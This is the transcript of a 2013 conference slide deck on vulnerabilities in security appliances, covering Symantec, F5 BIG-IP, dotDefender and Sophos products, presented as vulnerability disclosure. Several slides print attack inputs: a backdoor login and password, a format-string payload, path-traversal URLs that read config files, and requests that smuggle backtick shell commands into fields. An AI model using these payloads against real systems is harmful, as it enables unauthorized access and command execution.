Insecurity software

Insecurity software

PHDays'13

8b92dd9cdb06779f63c8747f3a3a2401?s=128

Alexander Antukh

May 24, 2013
Tweet

Transcript

  1. Insecurity Software PHDays 2013 Version: 1.0 Author: Alexander Antukh Responsible:

    Alexander Antukh Date: 24.05.2013 Confidentiality: Public
  2. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved

    Agenda •  Introduction •  What is Security Software •  Historical review •  The Question •  The Answer •  Vuln, where art thou? •  Afterword •  QA 2
  3. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved

    SEC Consult – Who we are Canada India Singapore SEC Consult Office SEC Consult Headquarter Other SEC Consult Clients Lithuania Germany Austria Central and Easter Europe •  Leading international application security consultancy •  Founded 2002 •  Headquarters near Vienna, Austria •  Delivery Centers in Austria, Germany, Lithuania and Singapore •  Strong customer base in Central and Eastern Europe •  Increasing customer base of clients with global business (esp. out of Top-10 US and European software vendors) •  35+ application security experts •  Industry focus banks, software vendors, government USA 3
  4. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved

    Alexander Antukh – Whoami •  Security consultant •  Offensive Security Certified Expert •  Defcon Moscow Local Group Coordinator *kidhacker 4
  5. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved

    Agenda •  Introduction •  What is Security Software •  Historical review •  The Question •  The Answer •  Vuln, where art thou? •  Afterword •  QA 5
  6. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved

    What is Security Software “A generic term referring to any computer program or library which purpose is to (help to) secure a computer system or a computer network” 6
  7. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved

    What is Security Software 7 The keyword in all the security software is…
  8. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved

    What is Security Software 8
  9. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved

    What is Security Software 9 In other words, SS is a piece of “anti-evil” software which makes you feel safe and “anti-bad”
  10. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved

    Agenda •  Introduction •  What is Security Software •  Historical review •  The Question •  The Answer •  Vuln, where art thou? •  Afterword •  QA 10
  11. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved

    Historical review Evolution: Packet filter Stateful FW App layer FW First appearance: 1988 First *registered* exploit: 1995 Objective: control network traffic and determine if it’s good enough to pass Firewall 11
  12. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved

    Historical review First appearance: 1986 First *registered* hack: 1999 Objective: monitor for malicious activities or policy violations (heuristics, signatures...) ID(P)S Ceci n‘est pas un firewall... ü Statistical anomaly-based ü Signature-based 12 ü Passive (detection) ü Reactive (prevention)
  13. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved

    Historical review AntiSpam evolution: Del First appearance: Monty Python First PoC: 1978 Industrial scale: 1994 - ... CAN-SPAM Act of 2003: spam is legal Keywords Blacklists Auth Protocol analysis Filtering 13
  14. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved

    14 Historical review First registered hack: 1903 (OSVDB-ID: 79399, 79400) Anti-sniffing “… I did it for the lulz” Today it’s net configuration, encryption and IDS/IPS Nevil Maskelyne
  15. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved

    15 Historical review First „viruses“: 1971 First viruses: mid-1980s First AVs: mid-1980s (CHK4BOMB, BOMBSQUAD, DRPROTECT) Virus evolution: Benign Destructive $$$$$ Anti-virus
  16. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved

    16 Historical review AV companies don’t stand still…
  17. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved

    17 Historical review … neither do other SS products
  18. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved

    18 Agenda •  Introduction •  What is Security Software •  Historical review •  The Question •  The Answer •  Vuln, where art thou? •  Afterward •  QA
  19. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved

    19 The question Do you know anybody less boring? What if the SS is vulnerable itself?
  20. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved

    20 The answer *sorry for my English
  21. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved

    21 Déjà vu (slide from PHDays 2012) •  Reverse engineering •  Checkpoint – Client side remote command execution Multiple Checkpoint appliances CVE-2011-1827 •  Fuzzing •  F5 Firepass – Remote command execution F5 FirePass SSL VPN – Remote command execution CVE-2012-1777 •  Application testing •  Microsoft ASP.Net – Authentication bypass Microsoft Security Bulletin MS11-100 - Critical Vulnerabilities in .NET Framework Could Allow Elevation of Privilege (2638420) CVE-2011-3416 Security software products will be the target of the trade ... soon !
  22. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved

    22 The time has come!
  23. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved

    The answer •  Symantec Messaging Gateway •  Backdoor by design Code execution •  F5 BIG-IP •  SQL Injection, XXE Passwords… Root access •  Applicure dotDefender WAF •  Format string vulnerability Code execution •  Sophos Web Protection Appliance •  LFI, OS Command Injection Command execution, admin account pwn Security software products are the target of the trade ... already! 23
  24. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved

    The answer “... inbound and outbound messaging security, with effective and accurate real-time antispam and antivirus protection, advanced content filtering, data loss prevention, and email encryption ...“ Symantec Messaging Gateway v.9.5.x SSH?! Remote shell! Login: support MD5: 52e3bbafc627009ac13caff1200a0dbf Password: symantec 24
  25. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved

    The answer F5 BIG-IP <= 11.2.0 “... from load balancing and service offloading to acceleration and security, the BIG-IP system delivers agility—and ensures your applications are fast, secure, and available ...“ 25
  26. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved

    The answer “... from load balancing and service offloading to acceleration and security, the BIG-IP system delivers agility—and ensures your applications are fast, secure, and available ...“ sam/admin/reports/php/getSettings.php à 26 F5 BIG-IP <= 11.2.0
  27. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved

    The answer “... dotDefender is a web application security solution (a Web Application Firewall, or WAF) that offers strong, proactive security for your websites and web applications ...“ Web Attack? 27 AppliCure dotDefender WAF <= 4.26
  28. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved

    28 The answer •  %MAILTO_BLOCK% - email entered in the “Email address for blocked request report” field •  %RID% - reference ID •  %IP% - server's IP address •  %DATE_TIME% - date of blocked request Error page can be configured in different ways: Vars to be added to the body of a custom page: Looks nice… AppliCure dotDefender WAF <= 4.26
  29. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved

    29 The answer Format string injection •  Variables •  Buffer •  ... •  AP_PRINTF() check for format string vulnerabilities … should be <%IP%> Host: … Algorithm: %666d\xBA\xAD\xBE\xEF… AppliCure dotDefender WAF <= 4.26
  30. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved

    30 The answer “... our award-winning Secure Web Gateway appliances make web protection easy. They are quick to setup, simple to manage and make policy administration a snap, even for non- technical users...“ Sophos Web Protection Appliance <= 3.7.8.1 https://<host>/cgi-bin/patience.cgi?id=.. ?id=../../persist/config/shared.conf%00 ?id=../../log/ui_access_log%00 "https://<host>/index.php? section=configuration&c=configuration&STYLE=8514d0a3c2fc9f8d47e29880767781 53" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:19.0) Gecko/20100101 Firefox/19.0" Passwords!
  31. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved

    31 The answer ` POST /index.php?c=diagnostic_tools HTTP/1.1 ... action=wget&section=configuration&STYLE=<validsessid>&url=%60sle ep%205%60 Diagnostic Tools “... our award-winning Secure Web Gateway appliances make web protection easy. They are quick to setup, simple to manage and make policy administration a snap, even for non- technical users...“ Sophos Web Protection Appliance <= 3.7.8.1
  32. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved

    32 The answer ` https://<host>/end-user/index.php?reason=application&client- ip=%20%60sleep+10%60 Block page (%%user_workstation%%“) “... our award-winning Secure Web Gateway appliances make web protection easy. They are quick to setup, simple to manage and make policy administration a snap, even for non- technical users...“ Sophos Web Protection Appliance <= 3.7.8.1
  33. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved

    33 The answer POST /index.php?c=local_site_list_editor HTTP/1.1 ... STYLE=<validsessid>&action=save&entries=[{"url"%3a+".'`sleep+10`'", +"range"%3a+"no",+"tld"%3a+"yes",+"valid_range"%3a+"no"}] Local Site List ` “... our award-winning Secure Web Gateway appliances make web protection easy. They are quick to setup, simple to manage and make policy administration a snap, even for non- technical users...“ Sophos Web Protection Appliance <= 3.7.8.1
  34. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved

    34 The answer Sophos Web Protection Appliance <= 3.7.8.1
  35. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved

    35 Agenda •  Introduction •  What is Security Software •  Historical review •  The Question •  The Answer •  Vuln, where art thou? •  Afterword •  QA
  36. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved

    Vuln, where art thou? •  Methods for identifying usable bugs in “Software products” •  Applicaton testing and Fuzzing •  Reverse engineering •  Source code analysis •  A short note on so called “security scanning” tools 36
  37. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved

    Vuln, where art thou? •  The workflow for the appliance analysis is pretty simple! •  get a virtual appliance demo version •  install the appliance •  add the .vmdk to another vm and mount it there (or use a linux fs driver that can mount vmdk files) •  add a new user to /etc/passwd, or change UID/shell/password of existing users (or maybe change the sudoers file, sshd config) •  start the appliance again and log in :) •  look at the services that are running (and their configuration) •  pwnage ;) 37
  38. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved

    Vuln, where art thou? *Move two matches to make it three equal squares 38
  39. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved

    39 Start me up! Vuln, where art thou?
  40. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved

    40 Agenda •  Introduction •  What is Security Software •  Historical review •  The Question •  The Answer •  Vuln, where art thou? •  Afterword •  QA
  41. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved

    41 Sometimes it’s easier to find the vulnerability than it might be expected . . . *doesn’t exist yet And now for something completely different
  42. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved

    QA